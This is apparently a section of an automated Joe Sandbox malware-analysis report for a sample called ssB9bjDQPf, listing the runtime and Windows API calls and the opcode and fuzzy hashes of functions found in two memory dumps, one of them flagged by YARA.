                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: __alldvrm$_strrchr
                                                    • String ID:
                                                    • API String ID: 1036877536-0
                                                    • Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                    • Instruction ID: f9e2c614c97b109978af50d7c538c2258677b2925616371172d48f7c9f1fa5ee
                                                    • Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                    • Instruction Fuzzy Hash: 44A15772A00B869FE721DE28C8817AEFBE5EF59310F28426FD5859B381C23C9D41C759
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __alldvrm$_strrchr
                                                    • String ID:
                                                    • API String ID: 1036877536-0
                                                    • Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                    • Instruction ID: 9d81ed378f210f101acab280f8335f5080636a3ffff2f394150189643d88bcde
                                                    • Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                    • Instruction Fuzzy Hash: 5BA148729007A69FD71A8F28C8857AEBFE1FF53310F54416DD4859B2C1E3348A49CB58
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: _free
                                                    • String ID:
                                                    • API String ID: 269201875-0
                                                    • Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                    • Instruction ID: 6d56401385933203687979e97415ab0492b269b4cfaee778896e5051d0ede453
                                                    • Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                    • Instruction Fuzzy Hash: B6413871F00110ABDB247BBB9C42AAF7AA4EF4D334F24263BF418C6291D63C5D49426D
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free
                                                    • String ID:
                                                    • API String ID: 269201875-0
                                                    • Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                    • Instruction ID: 6619548f8ecfa72452bce880e786e65f3b03d2b6d62c0071c039aed94688633b
                                                    • Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                    • Instruction Fuzzy Hash: E941FB31A001326BEB256FB8EC45AAE3B76FF87770F240615F828D65D0D77448498AAD
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,0252047A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 02526B51
                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02526BDA
                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 02526BEC
                                                    • __freea.LIBCMT ref: 02526BF5
                                                      • Part of subcall function 0252390E: RtlAllocateHeap.NTDLL(00000000,024FDAD7,00000000), ref: 02523940
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                    • String ID:
                                                    • API String ID: 2652629310-0
                                                    • Opcode ID: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
                                                    • Instruction ID: e16fc0060b2116cb141701702c4396ad0f2cea7a393e2f42db01020523b92277
                                                    • Opcode Fuzzy Hash: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
                                                    • Instruction Fuzzy Hash: 8731DE72A0022AABDF248F64CC80DAE7BA9FF41714F054268FC04DB1D0EB35D959CB94
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Xtime_diff_to_millis2_xtime_get
                                                    • String ID:
                                                    • API String ID: 531285432-0
                                                    • Opcode ID: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
                                                    • Instruction ID: bdb17b43c911747218acdb07252438506425be6b3c89ff1608d2b8794f0e438d
                                                    • Opcode Fuzzy Hash: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
                                                    • Instruction Fuzzy Hash: 0D213B75E002099FDF00EFE5DC829AEB7B8EF49714F10406AF901B7291DB78AD058BA5
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Xtime_diff_to_millis2_xtime_get
                                                    • String ID:
                                                    • API String ID: 531285432-0
                                                    • Opcode ID: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                    • Instruction ID: 7c3cf0bf3eda9c87ed3757d45915f23a9ec52cc68987ad8dc06e3129f2551feb
                                                    • Opcode Fuzzy Hash: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                    • Instruction Fuzzy Hash: B3215175E00209AFDF40EF95CC819BEBBB9EF89714F10006AE601A72A0D770AD01CF91
                                                    APIs
                                                    • SetEvent.KERNEL32(?,00000000), ref: 00423739
                                                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423721
                                                      • Part of subcall function 0041B72C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B74D
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0042376A
                                                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423793
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
                                                    • String ID:
                                                    • API String ID: 2630251706-0
                                                    • Opcode ID: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
                                                    • Instruction ID: dbe4a0063a9405d5797c392a8f70426852a24ed1b1212b264d4e29dc2c442ee4
                                                    • Opcode Fuzzy Hash: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
                                                    • Instruction Fuzzy Hash: 7A110B747002106BCF04AF65DC85DAEB779EB84761B104167FA06D7292CBAC9D41CA98
                                                    APIs
                                                    • ShowWindow.USER32(00000005), ref: 00401FAF
                                                    • UpdateWindow.USER32 ref: 00401FB7
                                                    • ShowWindow.USER32(00000000), ref: 00401FCB
                                                    • MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040202E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Window$Show$MoveUpdate
                                                    • String ID:
                                                    • API String ID: 1339878773-0
                                                    • Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                    • Instruction ID: 602c8894019c05b7ebd6ce0fe59bebabc4bc12c6f09791b7d1b76da355fd2427
                                                    • Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                    • Instruction Fuzzy Hash: 2A016531E106109BC7258F19ED04A267BA6EFD5712B15803AF40C972B1D7B1EC428B9C
                                                    APIs
                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 004290E3
                                                      • Part of subcall function 00429030: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042905F
                                                      • Part of subcall function 00429030: ___AdjustPointer.LIBCMT ref: 0042907A
                                                    • _UnwindNestedFrames.LIBCMT ref: 004290F8
                                                    • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429109
                                                    • CallCatchBlock.LIBVCRUNTIME ref: 00429131
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                    • String ID:
                                                    • API String ID: 737400349-0
                                                    • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                    • Instruction ID: 13de3582008bd49ed9905958b9893fc78844f15d2a413234128a3f7054c614fd
                                                    • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                    • Instruction Fuzzy Hash: 86018C32200158BBDF126F96EC41EEB7B69EF88758F444009FE0856121C73AEC71DBA8
                                                    APIs
                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 0251934A
                                                      • Part of subcall function 02519297: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 025192C6
                                                      • Part of subcall function 02519297: ___AdjustPointer.LIBCMT ref: 025192E1
                                                    • _UnwindNestedFrames.LIBCMT ref: 0251935F
                                                    • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 02519370
                                                    • CallCatchBlock.LIBVCRUNTIME ref: 02519398
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                    • String ID:
                                                    • API String ID: 737400349-0
                                                    • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                    • Instruction ID: 5fcaba44cfb3c7a17613419202aa68f815ddf28f59c07a2ce60f47e593805159
                                                    • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                    • Instruction Fuzzy Hash: A301D37210014ABBEF126E95CC41EEB7F6AFF88754F044418FE58A6120D736E861EBA4
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue), ref: 00434F61
                                                    • GetLastError.KERNEL32(?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FAC), ref: 00434F6D
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F7B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad$ErrorLast
                                                    • String ID:
                                                    • API String ID: 3177248105-0
                                                    • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                    • Instruction ID: 16700c29e50b3fc45f4951a54cc89878b259fef574b9c48791ea2bf1872b2532
                                                    • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                    • Instruction Fuzzy Hash: 9A01FC366152226FC7214F69EC449A77798AF89F71F141631F905D7240D724E9018AEC
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0252513D,00000000,00000000,00000000,00000000,?,025253F5,00000006,0044A378), ref: 025251C8
                                                    • GetLastError.KERNEL32(?,0252513D,00000000,00000000,00000000,00000000,?,025253F5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,02522213), ref: 025251D4
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0252513D,00000000,00000000,00000000,00000000,?,025253F5,00000006,0044A378,0044A370,0044A378,00000000), ref: 025251E2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LibraryLoad$ErrorLast
                                                    • String ID:
                                                    • API String ID: 3177248105-0
                                                    • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                    • Instruction ID: 65f21256a08ef282db8136ea20145121d6504f4f7d6c72b4fa9d6a8ec542418b
                                                    • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                    • Instruction Fuzzy Hash: 6001F236612332ABC7254F69AC44E56BF98BF47FA27500630F946E71C0E720D908CAEC
                                                    APIs
                                                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426148
                                                    • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042615C
                                                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426174
                                                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042618C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                    • String ID:
                                                    • API String ID: 78362717-0
                                                    • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                    • Instruction ID: ecb18499877976be64129c87880db9b40f2952d25c9d93d1b0c0aa07095992c1
                                                    • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                    • Instruction Fuzzy Hash: 2901F232700120B7DB12EE5A9801AFF77A99B94354F41005BFC11A7382DA24FD2192A8
                                                    APIs
                                                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 025163AF
                                                    • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 025163C3
                                                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 025163DB
                                                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 025163F3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                    • String ID:
                                                    • API String ID: 78362717-0
                                                    • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                    • Instruction ID: 34c929fcf68a8fe8e2f5e8b835268fc35d29786d965fb3efd239c3f3134a4376
                                                    • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                    • Instruction Fuzzy Hash: 1801F936610125BBEF16EE59C880FEF779EBF85360F000015EC21A7381DAB0ED10CAA8
                                                    APIs
                                                    • Concurrency::location::_Assign.LIBCMT ref: 02512BB1
                                                    • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02512BCF
                                                      • Part of subcall function 02508687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 025086A8
                                                      • Part of subcall function 02508687: Hash.LIBCMT ref: 025086E8
                                                    • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02512BD8
                                                    • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02512BF8
                                                      • Part of subcall function 0250F6DF: Hash.LIBCMT ref: 0250F6F1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                    • String ID:
                                                    • API String ID: 2250070497-0
                                                    • Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                    • Instruction ID: d89a8d4ee6685c06904dd67ce6cdf2d9d8173378abc9cde2c241bbd99f0c74ff
                                                    • Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                    • Instruction Fuzzy Hash: AB118E76800604AFC715DFA4C880ECAF7B9BF99320F014A1EEA56C7591DB70E904CFA4
                                                    APIs
                                                    • Concurrency::location::_Assign.LIBCMT ref: 02512BB1
                                                    • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02512BCF
                                                      • Part of subcall function 02508687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 025086A8
                                                      • Part of subcall function 02508687: Hash.LIBCMT ref: 025086E8
                                                    • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02512BD8
                                                    • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02512BF8
                                                      • Part of subcall function 0250F6DF: Hash.LIBCMT ref: 0250F6F1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                    • String ID:
                                                    • API String ID: 2250070497-0
                                                    • Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                    • Instruction ID: 058a89d7303aeaf489164443d2d0013101fca441b79a80ad3a8e5f3831df67fa
                                                    • Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                    • Instruction Fuzzy Hash: 0B011B76500605ABC724DFA5C881EDAB7E9BF98310F108A1EE65687590DB70F5448F64
                                                    APIs
                                                    • __EH_prolog3_GS.LIBCMT ref: 00405926
                                                      • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 00405971
                                                    • __Getcoll.LIBCPMT ref: 00405980
                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405990
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                    • String ID:
                                                    • API String ID: 1836011271-0
                                                    • Opcode ID: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
                                                    • Instruction ID: 86b703767978d3f357e5c0a9ff64a1160fbba7df876fc0f231fbc64f2b881c41
                                                    • Opcode Fuzzy Hash: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
                                                    • Instruction Fuzzy Hash: 6C013271900208DFDB00EFA5C481B9EB7B0AF40328F10857EE055AB682DB789988CF98
                                                    APIs
                                                    • __EH_prolog3_GS.LIBCMT ref: 024F50D1
                                                      • Part of subcall function 024FBDAE: __EH_prolog3_GS.LIBCMT ref: 024FBDB5
                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 024F511C
                                                    • __Getcoll.LIBCPMT ref: 024F512B
                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 024F513B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                    • String ID:
                                                    • API String ID: 1836011271-0
                                                    • Opcode ID: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
                                                    • Instruction ID: 49ed4b78a4a657679f6df88499d8d91cfc116898cf28d2fd104d30e20320ddff
                                                    • Opcode Fuzzy Hash: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
                                                    • Instruction Fuzzy Hash: 6D018872D10209AFDB80EFA4C980BAEB7B1BF94315F51802ED255AB280DB749544CF95
                                                    APIs
                                                    • __EH_prolog3_GS.LIBCMT ref: 024F5B8D
                                                      • Part of subcall function 024FBDAE: __EH_prolog3_GS.LIBCMT ref: 024FBDB5
                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 024F5BD8
                                                    • __Getcoll.LIBCPMT ref: 024F5BE7
                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 024F5BF7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                    • String ID:
                                                    • API String ID: 1836011271-0
                                                    • Opcode ID: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
                                                    • Instruction ID: 5add014a910186434b5806f2a4106405ce99bca981c5b3baf541dfd7ae3b1b75
                                                    • Opcode Fuzzy Hash: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
                                                    • Instruction Fuzzy Hash: AC0188729002099FDB80EFA4C480BAEB7B1BF84315F50802ED255AB280DBB89944CF95
                                                    APIs
                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF3D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Compare_exchange_acquire_4std::_
                                                    • String ID:
                                                    • API String ID: 3973403980-0
                                                    • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                    • Instruction ID: a39f72e40e0a7d69bee2e58a2fbea005eb0d9eb8afdd5f219c4e4bdc303a66e9
                                                    • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                    • Instruction Fuzzy Hash: 3201FB3745414DBBCF119E64DD429EE3B66EB05354B188417F918C4231C336CAB2AF8D
                                                    APIs
                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0250C170
                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0250C180
                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0250C190
                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0250C1A4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Compare_exchange_acquire_4std::_
                                                    • String ID:
                                                    • API String ID: 3973403980-0
                                                    • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                    • Instruction ID: 6b885dc433c1a0a3059363f2378e5221478797f1c2d1f38af764c65e248a232e
                                                    • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                    • Instruction Fuzzy Hash: 7F01CD7A404149BBDF129E94DC818AD3F66FF56352F448613F919841F0D732CA70EB89
                                                    APIs
                                                    • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110DB
                                                      • Part of subcall function 0041094D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041096F
                                                      • Part of subcall function 0041094D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410990
                                                    • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110EE
                                                    • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110FA
                                                    • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411103
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                    • String ID:
                                                    • API String ID: 4284812201-0
                                                    • Opcode ID: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
                                                    • Instruction ID: 3d6a6adf541079fe7b6c6bfd004b769b4972a14d6898e3ab699feac8cff21146
                                                    • Opcode Fuzzy Hash: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
                                                    • Instruction Fuzzy Hash: 61F02B31B00204A7DF24BBA644526FE36564F44318F04413FBA12EB3D1DEBC9DC1925D
                                                    APIs
                                                    • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413525
                                                      • Part of subcall function 004128AF: ___crtGetTimeFormatEx.LIBCMT ref: 004128C5
                                                      • Part of subcall function 004128AF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128E4
                                                    • GetLastError.KERNEL32 ref: 00413541
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413557
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00413565
                                                      • Part of subcall function 00412685: SetThreadPriority.KERNEL32(?,?), ref: 00412691
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
